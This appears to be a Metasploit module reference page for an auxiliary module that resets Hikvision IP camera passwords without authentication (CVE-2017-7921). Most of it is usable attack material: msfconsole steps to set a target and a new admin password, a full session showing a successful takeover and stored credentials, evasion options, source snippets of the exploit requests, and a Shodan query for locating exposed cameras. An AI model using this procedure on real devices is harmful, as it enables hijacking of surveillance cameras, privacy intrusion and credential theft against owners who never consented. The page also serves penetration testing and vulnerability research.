Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic - Metasploit
This page contains detailed information about how to use the auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic
Module: auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
Source code: modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb
Disclosure date: 2017-09-23
Last modification time: 2022-09-23 12:19:29 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-7921
Many Hikvision IP cameras contain improper authentication logic which allows unauthenticated impersonation of any configured user account. The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names. Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing (shodan search: '"App-webs" "200 OK"'). Some of these devices can never be patched due to to the vendor preventing users from upgrading the installed firmware on the affected device. This module utilizes the bug in the authentication logic to perform an unauthenticated password change of any user account on a vulnerable Hikvision IP Camera. This can then be utilized to gain full administrative access to the affected device.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
msf auxiliary(hikvision_unauth_pwd_reset_cve_2017_7921) > show targets
... a list of targets ...
msf auxiliary(hikvision_unauth_pwd_reset_cve_2017_7921) > set TARGET target-id
msf auxiliary(hikvision_unauth_pwd_reset_cve_2017_7921) > show options
... show and set options ...
msf auxiliary(hikvision_unauth_pwd_reset_cve_2017_7921) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Many Hikvision IP cameras contain improper authentication logic that allow unauthenticated impersonation of any configured user account. This allows an attacker to bypass all security on the camera and gain full admin access, allowing them to thereby completely control the camera and modify any setting or retrieve sensitive information.
This module allows the attacker to perform an unauthenticated password change on
any vulnerable Hikvision IP Camera by utilizing the improper authentication logic to
send a request to the server which contains an auth
parameter in the query string
containing a Base64 encoded version of the authorization in username:password
format.
Vulnerable cameras will ignore the username
parameter and will instead use the username
part of this string as the user to log in as. This can then be used to gain full
administrative access to the affected device.
The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
- DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
- DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
- DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
- DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
- DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
- DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
- DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
This module has been tested against a Hikvision camera with the specifications listed below:
- MANUFACTURER: Hikvision.China
- MODEL: DS-2CD2142FWD-IS
- FIRMWARE VERSION: V5.4.1
- FIRMWARE RELEASE: build 160525
- BOOT VERSION: V1.3.4
- BOOT RELEASE: 100316
Verification Steps
use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
set RHOSTS <TARGET HOSTS>
set RPORT <port>
set USERNAME <name of user>
set PASSWORD <new password>
check
set ID <id of user whose password you want to reset from "check" output>
run
- You should get a message that the password for the user has been successfully changed.
Options
STORE_CRED
This option allows you to store the user and password credentials in the Metasploit database for further use.
Scenarios
Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525
msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
RHOSTS => 192.168.100.180
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
PASSWORD => Pa$$W0rd
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
ID => 1
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
STORE_CRED => true
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
ID 1 yes ID (default 1 for admin)
PASSWORD Pa$$W0rd yes New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.100.180 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
t
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_CRED true no Store credential into the database.
USERNAME admin yes Username for password change
VHOST no HTTP server virtual host
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
[*] Following users are available for password reset...
[*] USERNAME:admin | ID:1 | ROLE:Administrator
[*] USERNAME:admln | ID:2 | ROLE:Operator
[+] 192.168.100.180:80 - The target is vulnerable.
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
[*] Running module against 192.168.100.180
[*] Following users are available for password reset...
[*] USERNAME:admin | ID:1 | ROLE:Administrator
[*] USERNAME:admln | ID:2 | ROLE:Operator
[*] Starting the password reset for admin...
[+] Password reset for admin was successfully completed!
[*] Please log in with your new password: Pa$$W0rd
[*] Credentials for admin were added to the database...
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.100.180 192.168.100.180 80/tcp (http) admin Pa$$W0rd Password
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921)
Go back to menu.
Msfconsole Usage
Here is how the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show info
Name: Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic
Module: auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-09-23
Provided by:
Monte Crypto
h00die-gr3y <[email protected]>
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ID 1 yes ID (default 1 for admin)
PASSWORD Pa$$W0rd yes New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_CRED true no Store credential into the database.
USERNAME admin yes Username for password change
VHOST no HTTP server virtual host
Description:
Many Hikvision IP cameras contain improper authentication logic
which allows unauthenticated impersonation of any configured user
account. The vulnerability has been present in Hikvision products
since 2014. In addition to Hikvision-branded devices, it affects
many white-labeled camera products sold under a variety of brand
names. Hundreds of thousands of vulnerable devices are still exposed
to the Internet at the time of publishing (shodan search:
'"App-webs" "200 OK"'). Some of these devices can never be patched
due to to the vendor preventing users from upgrading the installed
firmware on the affected device. This module utilizes the bug in the
authentication logic to perform an unauthenticated password change
of any user account on a vulnerable Hikvision IP Camera. This can
then be utilized to gain full administrative access to the affected
device.
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-7921
https://packetstormsecurity.com/files/144097
https://ipvm.com/reports/hik-exploit
https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921
https://seclists.org/fulldisclosure/2017/Sep/23
Module Options
This is a complete list of options available in the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 auxiliary module:
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show options
Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
ID 1 yes ID (default 1 for admin)
PASSWORD Pa$$W0rd yes New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_CRED true no Store credential into the database.
USERNAME admin yes Username for password change
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 auxiliary module:
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show advanced
Module advanced options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for
non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are a
uto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
.2)
UserAgent Mozilla/5.0 (Macintosh; Intel Mac OS no The User-Agent header to use for all requests
X 12.2; rv:97.0) Gecko/20100101 Firef
ox/97.0
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 module can do:
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apac
he)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apa
che)
HTTP::shuffle_get_params false no Randomize order of GET parameters
HTTP::shuffle_post_params false no Randomize order of POST parameters
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
- <PEER> - Communication error occurred: <E.MESSAGE>
- <PEER> - Communication error occurred: <E.MESSAGE>
- No response recieved from the target!
- No users were found in the returned CSS code!
- <PEER> - Communication error occurred: <E.MESSAGE>
- <PEER> - Communication error occurred: <E.MESSAGE>
- Target server did not respond to the password reset request
- Unknown Error. Password reset was not successful!
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
101: 'vars_get' => {
102: 'auth' => auth.strip
103: }
104: })
105: rescue StandardError => e
106: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
107: return Exploit::CheckCode::Unknown("#{peer} - Communication error occurred: #{e.message}")
108: end
109:
110: if res.nil?
111: return Exploit::CheckCode::Unknown('No response recieved from the target!')
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
102: 'auth' => auth.strip
103: }
104: })
105: rescue StandardError => e
106: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
107: return Exploit::CheckCode::Unknown("#{peer} - Communication error occurred: #{e.message}")
108: end
109:
110: if res.nil?
111: return Exploit::CheckCode::Unknown('No response recieved from the target!')
112: elsif res && res.code == 200
No response recieved from the target!
Here is a relevant code snippet related to the "No response recieved from the target!" error message:
106: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
107: return Exploit::CheckCode::Unknown("#{peer} - Communication error occurred: #{e.message}")
108: end
109:
110: if res.nil?
111: return Exploit::CheckCode::Unknown('No response recieved from the target!')
112: elsif res && res.code == 200
113: xml_res = res.get_xml_document
114: print_status('Following users are available for password reset...')
115: user_array = xml_res.css('User')
116: return Exploit::CheckCode::Safe('No users were found in the returned CSS code!') if user_array.blank?
No users were found in the returned CSS code!
Here is a relevant code snippet related to the "No users were found in the returned CSS code!" error message:
111: return Exploit::CheckCode::Unknown('No response recieved from the target!')
112: elsif res && res.code == 200
113: xml_res = res.get_xml_document
114: print_status('Following users are available for password reset...')
115: user_array = xml_res.css('User')
116: return Exploit::CheckCode::Safe('No users were found in the returned CSS code!') if user_array.blank?
117:
118: user_array.each do |user|
119: print_status("USERNAME:#{user&.at_css('userName')&.content} | ID:#{user&.at_css('id')&.content} | ROLE:#{user&.at_css('userLevel')&.content}")
120: end
121: return Exploit::CheckCode::Vulnerable
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
141: },
142: 'ctype' => 'application/xml',
143: 'data' => post_data
144: })
145: rescue StandardError => e
146: print_error("#{peer} - Communication error occurred: #{e.message}")
147: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
148: return nil
149: end
150:
151: if res.nil?
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
142: 'ctype' => 'application/xml',
143: 'data' => post_data
144: })
145: rescue StandardError => e
146: print_error("#{peer} - Communication error occurred: #{e.message}")
147: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
148: return nil
149: end
150:
151: if res.nil?
152: fail_with(Failure::Unknown, 'Target server did not respond to the password reset request')
Target server did not respond to the password reset request
Here is a relevant code snippet related to the "Target server did not respond to the password reset request" error message:
147: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
148: return nil
149: end
150:
151: if res.nil?
152: fail_with(Failure::Unknown, 'Target server did not respond to the password reset request')
153: elsif res.code == 200
154: print_good("Password reset for #{datastore['USERNAME']} was successfully completed!")
155: print_status("Please log in with your new password: #{datastore['PASSWORD']}")
156: if datastore['STORE_CRED'] == true
157: report_creds
Unknown Error. Password reset was not successful!
Here is a relevant code snippet related to the "Unknown Error. Password reset was not successful!" error message:
154: print_good("Password reset for #{datastore['USERNAME']} was successfully completed!")
155: print_status("Please log in with your new password: #{datastore['PASSWORD']}")
156: if datastore['STORE_CRED'] == true
157: report_creds
158: end
159: else
160: print_error('Unknown Error. Password reset was not successful!')
161: print_status("Please check the password rules and ensure that the user account/ID:#{datastore['USERNAME']}/#{datastore['ID']} exists!")
162: end
163: end
164: end
Go back to menu.
Related Pull Requests
References
- CVE-2017-7921
- PACKETSTORM-144097
- https://ipvm.com/reports/hik-exploit
- https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921
- https://seclists.org/fulldisclosure/2017/Sep/23
See Also
Check also the following modules related to this module:
- auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
- exploit/linux/http/hikvision_cve_2021_36260_blind
- exploit/linux/misc/hikvision_rtsp_bof
- auxiliary/admin/http/cfme_manageiq_evm_pass_reset
- auxiliary/admin/http/intersil_pass_reset
- auxiliary/admin/http/linksys_tmunblock_admin_reset_bof
- auxiliary/admin/http/mantisbt_password_reset
- auxiliary/admin/http/netgear_r6700_pass_reset
- auxiliary/admin/http/nuuo_nvrmini_reset
- auxiliary/admin/http/rails_devise_pass_reset
- auxiliary/admin/2wire/xslt_password_reset
- auxiliary/admin/chromecast/chromecast_reset
- auxiliary/admin/dcerpc/cve_2020_1472_zerologon
- auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- auxiliary/admin/sap/cve_2020_6287_ws_add_user
- auxiliary/gather/coldfusion_pwd_props
- auxiliary/gather/konica_minolta_pwd_extract
- auxiliary/gather/xerox_pwd_extract
- auxiliary/scanner/http/titan_ftp_admin_pwd
- auxiliary/scanner/printer/canon_iradv_pwd_extract
- auxiliary/scanner/http/bmc_trackit_passwd_reset
- auxiliary/scanner/http/epmp1000_reset_pass
- auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
- auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key
- auxiliary/scanner/rdp/cve_2019_0708_bluekeep
Authors
- Monte Crypto
- h00die-gr3y <h00die.gr3y[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.